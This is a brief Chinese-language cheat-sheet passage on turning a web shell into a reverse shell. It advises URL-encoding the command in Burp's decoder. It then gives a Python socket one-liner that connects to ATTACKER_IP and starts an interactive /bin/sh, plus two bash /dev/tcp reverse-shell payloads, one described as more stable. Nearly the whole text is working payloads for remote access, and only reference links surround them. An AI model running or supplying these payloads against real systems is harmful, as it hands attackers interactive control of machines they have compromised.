只需要使用burp的decoder功能,将命令url编码一下就可以了。
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
参考:https://w00troot.blogspot.com/2017/05/getting-reverse-shell-from-web-shell.html
bash的反弹shell
bash -i 1>&/dev/tcp/${HOST}/${PORT} 2>&1 0>&1
具有一定的局限性:
参考:https://www.jianshu.com/p/80d6b5a61372
使用以下payload会更稳定:
bash -c 'bash -i 1>&/dev/tcp/${HOST}/${PORT} 2>&1 0>&1'